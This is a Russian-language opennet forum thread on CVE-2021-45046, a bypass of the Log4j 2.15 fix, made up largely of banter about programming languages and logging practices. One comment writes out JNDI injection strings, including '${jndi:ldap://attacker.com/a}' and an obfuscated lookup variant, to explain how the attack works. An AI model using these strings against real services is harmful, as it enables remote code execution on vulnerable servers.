Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Изначальное сообщение		[ Отслеживать ]

"Новый вариант атаки на Log4j 2, позволяющий обойти добавленную защиту"	+/–
Сообщение от opennews (??), 15-Дек-21, 10:33
В реализации подстановок JNDI в библиотеке  Log4j 2 выявлена ещё одна уязвимость (CVE-2021-45046), проявляющаяся несмотря на добавленные в выпуск 2.15 исправления и независимо от использования настройки "log4j2.noFormatMsgLookup" для защиты. Проблема представляет опасность в основном для старых версий Log4j 2, защищённых при помощи флага "noFormatMsgLookup", так как даёт возможность обойти защиту от прошлой узявимости (Log4Shell, CVE-2021-44228), позволяющей выполнить свой код на сервере. Для пользователей версии 2.15 эксплуатация ограничивается созданием условий для аварийного завершения приложения из-за исчерпания доступных ресурсов... Подробнее: https://www.opennet.me/opennews/art.shtml?num=56347
Ответить | Правка | Cообщить модератору

Сообщения

[Сортировка по ответам | RSS]

1. Сообщение от Аноним (1), 15-Дек-21, 10:33	–2 +/–
всё что сложнее колеса, помните? з.ы. хачу ещё плюсиков
Ответить | Правка | Наверх | Cообщить модератору

2. Сообщение от InuYasha (??), 15-Дек-21, 10:33	+/–
И снова "вакцина" не работает. Символично :)
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #13

3. Сообщение от DEF (?), 15-Дек-21, 10:35	+16 +/–
Это какой-то позор?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #4, #5, #90

4. Сообщение от Аноним (1), 15-Дек-21, 10:36	+5 +/–
ну это каждый местный эксперт сам решает
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3

5. Сообщение от Аноним (5), 15-Дек-21, 10:40	–7 +/–
> Initial release    January 8, 2001; 20 years ago Диды по-другому не могли, постоянно выдумывали какие-то "прикольные штуки" типа например IP-адреса, в котором вместо десятичных чисел какие-то другие. Вот и тут диды решили добавить "фичу".
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #25, #26, #66

7. Сообщение от Аноним (7), 15-Дек-21, 10:43	–20 +/–
Надоели!!!! Log4j2 как сам, так и опасный контекст из vulnerability issue, использует полтора программиста на этой планете. Крики такие, как будто это реальная проблема. Похоже на откровенную попытку слива Java как технологии.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #9

9. Сообщение от Аноним (9), 15-Дек-21, 10:55	+8 +/–
Как соотносится "использует полтора программиста" и подтверждённое проявление уязвимости в продуктах GitHub, Docker, Oracle, vmWare, Broadcom и Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, Intel, NATS, Trend Micro, Aruba Networks, Microsoft, Siemens и Rockwell? Это одна из самых опасных уязвимостей за последние лет 5, из-за того, что затрагивает кучу банковского, телекоммуникационного, корпоративного и промышленного софта. И это только начало, дальше можно ждать волну supply chain атак после взлома инфраструктур производителей.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #7 Ответы: #11, #29

10. Сообщение от Аноним (10), 15-Дек-21, 11:01	+8 +/–
У уязвимости есть уже подходящее имя? Предлагаю Log4jopa.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #16, #23, #56, #58

11. Сообщение от Аноним (7), 15-Дек-21, 11:01	–3 +/–
> Как соотносится "использует полтора программиста" и подтверждённое проявление уязвимости в продуктах GitHub, Docker, Oracle, vmWare, Broadcom и Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, Intel, NATS, Trend Micro, Aruba Networks, Microsoft, Siemens и Rockwell? Фактом наличия в зависимостях проектов. То есть, никак, по факту.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9 Ответы: #12, #20

12. Сообщение от полураспад (?), 15-Дек-21, 11:05	+1 +/–
в нормальном коде не выводятся параметры приходящие от пользователя в лог, плюс это проверка давно существует в анализаторах безопастности, они показывают где параметры из запросов логируются в лог
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11 Ответы: #14, #18, #28, #30, #76, #100, #102

13. Сообщение от Аноним (13), 15-Дек-21, 11:07	+1 +/–
"Вакцина" да, не работает, в отличие от вакцин
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2

14. Сообщение от Аноним (13), 15-Дек-21, 11:11	+4 +/–
Выходит "нормальный" по вашим представлениям код в корпоративной среде не встречается. Плюс на практике было показано как уязвимость работала в системах Amazon, Microsoft и многих других. У них "анализаторы безопасности" тоже какие-то неправильные? К чему в таком случае вся эта ремарка?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12 Ответы: #93

15. Сообщение от Аноним (16), 15-Дек-21, 11:13	–8 +/–
Где же тысячи глаз попенсорса??? которые должны находить каждую уазвимость за наносек после коммита???
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #17

16. Сообщение от Аноним (16), 15-Дек-21, 11:15	+1 +/–
Log4calypse же
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10

17. Сообщение от eugener (ok), 15-Дек-21, 11:19	+11 +/–
Ну так вот и нашли.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #15 Ответы: #19, #96

18. Сообщение от Аноним (18), 15-Дек-21, 11:20	+2 +/–
Скажите это тем, кто пишет в лог значение User Agent, X-Forward-For и прочих заголовков. В логи такое пишут повсеместно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12

19. Сообщение от Аноним (16), 15-Дек-21, 11:21	+1 +/–
*находить и не пущать в релиз
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17 Ответы: #21, #22, #33

20. Сообщение от Аноним (18), 15-Дек-21, 11:22	+2 +/–
Это компании которые _сами_ подтвердили проявление уязвимости Log4j в своих продуктах. Логи с отражением User Agent по умолчанию ведут почти все корпоративные системы.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11 Ответы: #31

21. Сообщение от тысячегласс (?), 15-Дек-21, 11:22	+/–
Э, а вот так мы не договаривались!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #19

22. Сообщение от eugener (ok), 15-Дек-21, 11:22	+3 +/–
Тогда это считалось фичей. Круто же, лукапить строчки из лога. А эти хакеры всё опошлили.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #19 Ответы: #49

23. Сообщение от Анимус (?), 15-Дек-21, 11:30	+/–
log4jShell
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10

25. Сообщение от Аноним (25), 15-Дек-21, 11:33	+14 +/–
> Диды по-другому не могли, постоянно выдумывали какие-то "прикольные штуки" типа... Диды писали и пушут на Си. А джаверы - это растоманы v1.0, как и те, которые придумали IPv6. Диды уже в те времена смотрели на них искоса.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #34, #52, #123

26. Сообщение от Mike Lee (?), 15-Дек-21, 11:47	+4 +/–
Э нет, в log4j 1.x этого не было.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5

28. Сообщение от Фняк (?), 15-Дек-21, 11:55	+4 +/–
Это почему? Вот вызвали функцию с какими-то параметрами. Функция проверила параметры и какие-то из них не валидны. Перед тем как вернуть соответствующий код возврата она пишет в лог сообщение о том что вот не получилось выполнить работу потому во то условие не выполняется при вот этих входных параметрах. Пишет это она для админа на случай если к нему придут с вопросами «а почему не работает?» функция сама по себе понятия не имеет откуда переданные параметры взялись, от пользователя или ещё откуда
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12

29. Сообщение от пох. (?), 15-Дек-21, 11:56	+4 +/–
Причем жопа в том что это как раз то о чем многажды говорили большевики - пытаясь заставить формошлепов использовать библиотеки операционной системы, а не намертво слинковать прожект с кучей мусора со всего интернета, непременнейше - наираспоследней версии на момент линковки. Но это немодно, немолодежно и в модных-современных язычках вообще неосуществимо. Поэтому в отличие от вполне тоже опасных и реальных уязвимостей в той же openssl - нельзя исправить большую часть проблем банально обновив "открытую" библиотеку. Будем сидеть и ждать пока орацле, броацом и амазоны с жуниперами разродятся - по каждому из миллиона своих подeлий отдельно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9 Ответы: #69

30. Сообщение от пох. (?), 15-Дек-21, 11:58	+8 +/–
точно, нормальный код логает в лог только ok и error. Предоставляя гадать, что именно было ok и чего error. Дайте угадаю - вы разработчик на модном языке?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12

31. Сообщение от Аноним (-), 15-Дек-21, 11:58	+2 +/–
1) Далеко не все делают бесконтрольную подстановку данных, принятых от пользователя, непосредственно в ".. {}.." лога. 2) Не самый распространённый случай использования JNDI внутри организации. 3) Неплохо бы иметь доступ к ресурсам JNDI из сети, где расположен сервис. А теперь вопрос - скольких компаний  это реально касается до такой степени, чтобы кричать "ужас-ужас"?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #20 Ответы: #40, #60

33. Сообщение от Аноним (33), 15-Дек-21, 12:09	+2 +/–
Про релиз договора не было. Было только про то что нашли.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #19

34. Сообщение от Аноним (5), 15-Дек-21, 12:10	–11 +/–
> Диды писали и пушут на Си. Ой ли? Традиционным языком дидов является пердл со страшными writeonly-регекспами. Вот и в этой cve чувствуется любовь дидов к прикольным)))) магическим))) строкам.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #25 Ответы: #51, #84

35. Сообщение от Анатолий (??), 15-Дек-21, 12:17	+3 +/–
Простое решение уязвимости в любой версии - отказ от JNDI. в библиотеке log4j-core-x.x.x.jar удалить класс /org/apache/logging/log4j/core/lookup/JndiLookup.class и тогда конструкция ${jndi:...} просто не обрабатывается
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #36

36. Сообщение от Аноним (5), 15-Дек-21, 12:21	+6 +/–
ща погодь, я на продакшоне сразу. Скинь плз на почту этот jar с удаленным классом, тимлид над душой стоит, целый банк уязвим как-никак
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35 Ответы: #43, #104

40. Сообщение от Аноним (40), 15-Дек-21, 12:36	+3 +/–
> не все делают бесконтрольную подстановку данных, принятых от пользователя, непосредственно в ".. {}.." лога. А как надо правильно логировать http запрос от пользователя?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #31 Ответы: #42, #77

42. Сообщение от Аноним (7), 15-Дек-21, 12:45	+2 +/–
Любым способом, не подразумевающим подстановку поля, полученного от пользователя в конструкцию "{}". Вроде не сложно такой подобрать PS: если руководствоваться здравым смыслом при написании программы, то случаев, когда значения HTTP-заголовков подставляются в log4j непосредственно, не так уж и много. И вообще, не приходит в голову, когда это может понадобиться.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #40 Ответы: #48, #65, #73

43. Сообщение от Анатолий (??), 15-Дек-21, 12:46	+4 +/–
у меня старый log4j версии 2.4 переход на 2.15.0 выл связан с несколькими несовместимости (используется runtime настройка логгеров) Сделал log4j-core-2.4.2.jar залил в свой бинарный репозиторий (закрытый) и подключил его. С любым log4j-core-х.х.х.jar можно проделать то же самое еще раз расширенно: в библиотеке уделить класс /org/apache/logging/log4j/core/lookup/JndiLookup.class при загрузке системы инициализация библиотеки не найдет этот класс в выдаст в лог предупреждение: JNDI lookup class is not available because this JRE does not support JNDI. JNDI string lookups will not be available, continuing configuration. При этом все будет работать, но уязвимости не будет за неимением класса, в котором и была уязвимость
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #36

44. Сообщение от Аноним12345 (?), 15-Дек-21, 12:48	–3 +/–
А я говорил - не ходите дети в африку гулять Жаба - проприетарное зло
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #45, #50

45. Сообщение от Аноним (-), 15-Дек-21, 12:51	+1 +/–
> Жаба - проприетарное зло Есть альтернатива?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44 Ответы: #63, #101

48. Сообщение от Урри (ok), 15-Дек-21, 12:56	+/–
А если {} уже в полученном от пользователя поле?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42 Ответы: #53

49. Сообщение от Урри (ok), 15-Дек-21, 12:58	+2 +/–
Старая история про солонки, да.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #22

50. Сообщение от Урри (ok), 15-Дек-21, 12:58	+2 +/–
log4j вполне себе фри- и опенсорсный.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44

51. Сообщение от Аноним (51), 15-Дек-21, 13:00	+7 +/–
Ларри слабал perl в 1987 году И Ларри, к сведению, лингвист. Делал для себя костылик, для применения в конкретном месте.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #34 Ответы: #57

52. Сообщение от Аноним (51), 15-Дек-21, 13:04	+1 +/–
>> Диды уже в те времена смотрели на них искоса. Целевая аудитория java была - "для кого С++ слишком сложно". Можно сканы журналов ещё найти с оракловым маркетингом. Смотрели на них, как на убогих
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #25 Ответы: #62, #64, #75, #99

53. Сообщение от Аноним (-), 15-Дек-21, 13:05	–1 +/–
msg.replace("{", "") Ну, или, не используйте log4j2.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #48 Ответы: #54, #110

54. Сообщение от Аноним (54), 15-Дек-21, 13:17	+1 +/–
Вы лучше не используйте replace. Ибо %7B
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #53 Ответы: #70

56. Сообщение от Аноним (56), 15-Дек-21, 13:20	+4 +/–
Log4uckup
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10

57. Сообщение от Урри (ok), 15-Дек-21, 13:24	+2 +/–
Что ты объясняешь этому мальчику? Он только вчера прочитал магическое "этот язык вместо вас будет все программировать безопастно, за неделю можно стать программистом с шестизначной зарплатой" в подземном переходе и сейчас удивляется старперам, которые настолько глупы, что не следуют его примеру.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #51

58. Сообщение от Омномном2 (?), 15-Дек-21, 13:25	+/–
Смотреть бесплатно и без регистрации: Amateurs Log4Codeshot compilation
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10

60. Сообщение от Аноним (60), 15-Дек-21, 13:40	+1 +/–
Достаточно любой подстановки внешних данных в лог, не важно как они переданы через подстановку или голой строкой. Главная проблема в этой узявимости, что Log4j сам разберёт "${..}" в выводимой строке, никаких особых подстановок для этого делать не нужно. Т.е.  написал в коде "logger.info(extvar);" и можно хакнуть, если есть возможность переть в  extvar что-то типа "${jndi:ldap://attacker.com/a}" или "${env:FOO:-j}ndi:${lower:L}da${lower:P}", как в примере в новости.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #31 Ответы: #72

62. Сообщение от АнонимГоним (?), 15-Дек-21, 13:50	+4 +/–
>Можно сканы журналов ещё найти с оракловым маркетингом. Sun же, или уже забыли.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52 Ответы: #74, #108

63. Сообщение от Аноним (54), 15-Дек-21, 13:58	–1 +/–
C#
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #45 Ответы: #71, #82

64. Сообщение от примерно_36_скотинок (ok), 15-Дек-21, 13:59	+2 +/–
прямо как сейчас растаманы.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52

65. Сообщение от примерно_36_скотинок (ok), 15-Дек-21, 14:02	+/–
утверждая, что их дерьмо надо было покрыть глазурью, посахарить и вот-тогда-то получится конфетка. просто видите ли говно неправильно готовят.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42

66. Сообщение от Аноним (66), 15-Дек-21, 14:08	+5 +/–
Благодаря такому формату IP до сих пор нет Великого Российского Фаервола, потому что Шигорин так и не смог объяснить ФСБшникам что такое IP адрес. Деды знали что делали.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #89

67. Сообщение от Аноним (67), 15-Дек-21, 14:19	+/–
А ведь Java безопасно работает с памятью, а всё равно дыра как такое может быть?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #79, #83, #103

69. Сообщение от макпыф (ok), 15-Дек-21, 14:21	+1 +/–
просто системные либы могут быть разные. А модно молодежным програмистам хочется подключить 100500 либ, а вот поддерживать это все - нет. Потому просто бандлят единственно верную версию и статически/странным образом прибивают гвоздями. Обновляется это все конечно только в случае пинка под зад. Потому мне приходится 100500 часов компилить забандленные в пакет либы (причем многолетней выдержки), когда я пару часов назад уже скомпилил их (причем актуальной версии). Можно конечно пытаться патчить все это дерьмо, на так как все заточенно под единственно верную версию - может быть очень много геморроя. Итого: все это дерьмо с "релизами" где обновленна какая нибудь nss/log4j и многочасовая компиляция ни пойми чего.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #29

70. Сообщение от Аноним (7), 15-Дек-21, 14:38	+/–
%7B тоже log4j2 интерпретирует?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #54

71. Сообщение от Аноним (7), 15-Дек-21, 14:40	+1 +/–
абсолютно не проприетарный без 99% контроля одной коммерческой компании?.... Самому не смешно?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #63

72. Сообщение от Аноним (7), 15-Дек-21, 14:46	+/–
Как хорошо, что ничего кроме slf4j/logback у нас не используется....
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #60

73. Сообщение от Аноним (40), 15-Дек-21, 14:51	+/–
Если я подставлю допустим объект, содержащий тело и мапу заголовков - это нормально? Главное не подставить в {} строку со значением?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42 Ответы: #92

74. Сообщение от YetAnotherOnanym (ok), 15-Дек-21, 14:56	+/–
Ооо, даааа... Сам читал интервью с МакНили, которое кто-то вывесил на доске объявлений нашего мехмата, ещё в девяносто-хрен-знает-каком году. Прямо такие дифирамбы жабе пел, что куды ж там.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #62

75. Сообщение от Аноним (1), 15-Дек-21, 14:59	–3 +/–
> Целевая аудитория java была - "для кого С++ слишком сложно" Эм, и что в нём сложного? ЯП ВУ же. Под вопросом только читабельность кода из под клавиатуры особых "умельцев", это лично меня от него отталкивало всегда.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52 Ответы: #94

76. Сообщение от quantic (?), 15-Дек-21, 15:06	+1 +/–
Проблема не в том что значения от пользователя выводятся в лог, проблема в том что log4j их не фильтрует. Это их факап.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12

77. Сообщение от YetAnotherOnanym (ok), 15-Дек-21, 15:07	+/–
> А как надо правильно логировать http запрос от пользователя? Дословно, с предварительным обеззараживанием, обесклычиванием, убеганием и прочими аналогичными процедурами.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #40 Ответы: #105

79. Сообщение от cheater (?), 15-Дек-21, 15:14	+6 +/–
При чем здесь память, это ошибка поведения - eval произвольных данных.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67 Ответы: #81

81. Сообщение от Аноним (82), 15-Дек-21, 15:28	+3 +/–
> ошибка поведения И это - будущее раста.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #79 Ответы: #87

82. Сообщение от Аноним (82), 15-Дек-21, 15:29	+/–
О, про него ещё кто-то помнит О_о
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #63

83. Сообщение от gogo (?), 15-Дек-21, 15:46	+/–
Этого не может быть. Это заговор, как китайский короновирус.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67

84. Сообщение от Аноним (25), 15-Дек-21, 15:58	+2 +/–
> Ой ли? Традиционным языком дидов является пердл со страшными writeonly-регекспами. Я сам из дидов, но в пердл толком даже не умею. В скриптовых языках мне вообще всегда REXX больше всего нравился. Но сейчас уже мало дидов осталось, которые умеют в REXX.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #34 Ответы: #88

87. Сообщение от Аноним (87), 15-Дек-21, 17:07	–2 +/–
> И это - будущее раста. Это прошлое раста. В C++ этой проблемы уже давным давно нет.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #81 Ответы: #106

88. Сообщение от Crazy Alex (ok), 15-Дек-21, 17:22	+4 +/–
Ну я вот в перл умею. И он не страшнее остального, что создавалось в его время. Больше того - если сравнивать с тем, что он заменил - а это shell, awk и sed - то он на порядок читабельнее и безопаснее. У него есть и архаика, конечно - хотя бы отсутствие нормальных прототипов функций с именованными параметрами, да и читать что-то вроде $myMap->{$keysArray->{$index}} не совсем удобно, но, с другой стороны, это, кажется, единственный из скриптовых, различающий объекты и ссылки на них, что в своё время было необходимостью, позволяя экономить память. А вот все эти префиксы $%@ (скаляр, мапа, массив), в сущности, крайне удобны, потом отвыкал от них с грустью. Регэкспы - тема отдельная, они везде страшные. Учитыавя сферу применения - а это прежде всего работа с текстами - то никуда от них не деться даже сейчас.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #84 Ответы: #97, #118

89. Сообщение от X86 (ok), 15-Дек-21, 17:53	–1 +/–
Зато есть великий американский файрволл, и вот что с ним делать не знает никто.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #66 Ответы: #124

90. Сообщение от Kuromi (ok), 15-Дек-21, 18:20	+/–
Не, просто починили не коренную проблему, а залатали именно ту дырку на которую указали белые шапки. То что рядом еще россыпь и небольшая корректировка атаки позволяет снова бить в туже коренную уязвимость - "пожли пдечами".
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3

92. Сообщение от Аноним (7), 15-Дек-21, 18:33	+/–
Пример из оригинала - https://www.lunasec.io/docs/blog/log4j-zero-day/#example-vul... Если нет в строке {..}, то ничего и не запустит. URL-decode оно само делать не умеет.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #73

93. Сообщение от Аноньимъ (ok), 15-Дек-21, 18:43	+/–
>Выходит "нормальный" по вашим представлениям код в корпоративной среде не встречается. А ведь он прав.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #14

94. Сообщение от DeadMustdie (??), 15-Дек-21, 19:30	+2 +/–
> Эм, и что в нём сложного? Метапрограммирование в целом и шаблоны в частности. Множественное наследование классов. Переопределение операторов, особенно в связке с шаблонами. Все перечисленные выше инструменты крайне полезны, но притом довольно сложны в нетривиальных случаях.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #75

96. Сообщение от DeadMustdie (??), 15-Дек-21, 19:38	+/–
> Ну так вот и нашли. Вроде нашёл инженер из Алибабы, в процессе сопровождения внутренностей алибабовских сервисов. Ни разу не энтузиаст-бессребреник.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17

97. Сообщение от ms is piace of s (?), 15-Дек-21, 20:18	+/–
/bin/bash находится одесную Отца. Не богохульствуй.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #88 Ответы: #112

98. Сообщение от Онаним (?), 15-Дек-21, 20:23	+7 +/–
Ну всё, сейчас будут вместо того, чтобы eval убрать, городить кучу валидаций, и в итоге эти валидации всё равно будут обходить.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #120

99. Сообщение от ms is piece of s (?), 15-Дек-21, 20:26	+/–
Один известный персонаж с усиками тоже имел привычку смотреть на некоторых как на убогих. Тут дело не в ЯП, а в том, что "соль земли" отказывает себе в психологической помощи со стороны специалистов.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52

100. Сообщение от john_erohin (?), 15-Дек-21, 20:28	+/–
> в нормальном коде не выводятся параметры приходящие от пользователя в лог, врать не надо. навскидку: apache выводит referer и user-agent (оба от пользователя) в combined log. bind выводит попытки рекурсии от обнаглевших "сканеров безопастности" в лог. что, у них ненормальный код ?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12

101. Сообщение от Аноним (101), 15-Дек-21, 20:38	+/–
Есть.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #45

102. Сообщение от Аноним (102), 15-Дек-21, 20:45	+/–
Только эксперты с opennet знают как правильно писать код. Жаль что почему-то не пишут
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12

103. Сообщение от ms is piece of s (?), 15-Дек-21, 20:50	+/–
А ведь люди сперва распарсевают смысл написанного, а всё равно задают глупые вопросы как такое может быть?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67 Ответы: #109

104. Сообщение от ms is piece of s (?), 15-Дек-21, 20:57	+5 +/–
На, лови: log4j-core-2.4.2.jar.exe Короче, это пофикшеный логфорджи, плюс он автоматически ищет другие либы логфорджи во всех каталогах ос и тоже их фиксит от уязвимости. Отправь пожалуйста всем своим знакомым, скорее всего у них тоже где-нибудь да есть уязвимая версия.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #36 Ответы: #117

105. Сообщение от Аноним (102), 15-Дек-21, 21:39	+/–
Подскажите, как правильно обезораживать и обесклычивать в java?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #77 Ответы: #113

106. Сообщение от Аноним (87), 15-Дек-21, 21:44	–2 +/–
Более того добавлю. В С++ все эти проблемы которые вы тут вешаете на С были решены настолько давно, что про раст никто даже не думал. Так что забейте. Читайте книжки по C++ и будьте счастливы, удивитесь тому что всех этих проблем в C++ давным давно нет.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #87 Ответы: #116

107. Сообщение от anonymous (??), 15-Дек-21, 22:48	+3 +/–
А ведь это даже не сишечка с переполнением буфера. А вполне кошерный менеджмент памяти со сборкой мусора. Может дело не в них?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #111

108. Сообщение от Аноним (51), 15-Дек-21, 22:53	+/–
>> Sun же, или уже забыли. Ох ты ж... Да, слиплись в памяти в одно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #62 Ответы: #114

109. Сообщение от Аноним (109), 16-Дек-21, 06:39	+/–
> люди сперва распарсевают смысл написанного Да ладно тебе. Ну кто таким заниматься будет?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #103

110. Сообщение от Онаним (?), 16-Дек-21, 09:10	+/–
Вот, самое правильное предложение. Тянуть в рот васянские поделки - зло. Тем более, что изобретение данного "велосипеда" - дело по сути минутное.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #53

111. Сообщение от Онаним (?), 16-Дек-21, 09:12	+1 +/–
Да как обычно, дело не в бобине...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #107 Ответы: #115

112. Сообщение от ммнюмнюмус (?), 16-Дек-21, 12:04	+1 +/–
> /bin/bash находится одесную Отца. Не богохульствуй. Ошибка 1, 20: ожидалось предлог местоположения и направление после "находится". Bash хорош для чего угодно кроме скриптов. Конечно, если это не однодневные васянские скрипты для решения задачи на месте. Если на распространение - то хотя бы на /bin/dash.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #97

113. Сообщение от YetAnotherOnanym (ok), 16-Дек-21, 15:43	+/–
С этим обращайтесь на стаковерфлоу.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #105 Ответы: #122

114. Сообщение от Аноним (114), 16-Дек-21, 17:54	+2 +/–
> java просто памяти не хватило
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #108

115. Сообщение от _ (??), 16-Дек-21, 19:39	+/–
сейчас где то умер котё^W ржавчик. Как же так то?! ржавчина "нэ спасэ?!" ... какая боль ... ;-D
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #111 Ответы: #119

116. Сообщение от _ (??), 16-Дек-21, 19:41	+/–
Ну да - если плюсы не юзать - плюсопроблем и нет ... Л-логика :) Для дюбого Ёзыга подходит. А они все - ***но, потому как нет нет большой красной кноки "Сделать ЗБС!" ни в одном :( :-D
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #106

117. Сообщение от тигар.логиниться.лень (?), 17-Дек-21, 11:58	+/–
срочно переделай. распространять нужно  в виде даунлоадера правильной, патченной, JARки. Этим ты сможешь обеспечить страдальцам-рукозадам всегда свежую, правильную, версию.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #104

118. Сообщение от keydon (ok), 17-Дек-21, 18:50	+/–
Тоже скучаю, для скриптов удобнее питона, гораздо более читаемо чем баш, довольно лаконичен и не особо прожорлив.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #88

119. Сообщение от Аноним (82), 18-Дек-21, 02:54	+/–
Не только не спасает, а даже облегчает написание троянов.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #115

120. Сообщение от Аноним (82), 18-Дек-21, 02:56	+/–
В любой валидации будет дыра, ведь код пишут прогосеки с растаманоподобными мозгами.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #98 Ответы: #121

121. Сообщение от Онаним (?), 18-Дек-21, 19:00	+/–
Это называется "за смузи проeval'и зияющую дырину".
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #120

122. Сообщение от Аноним (102), 19-Дек-21, 10:07	+/–
Что же ты пишешь что нужно обесклычивать если сам не знаешь как это делать?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #113

123. Сообщение от Аноним (-), 23-Дек-21, 12:01	+/–
> Диды писали и пушут на Си. От которых жабисты и научились в format vuln. Догнали и перегнали, акселерация.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #25

124. Сообщение от Аноним (-), 23-Дек-21, 12:02	+/–
Тут несколько опечаток в слове "китайский".
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #89

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема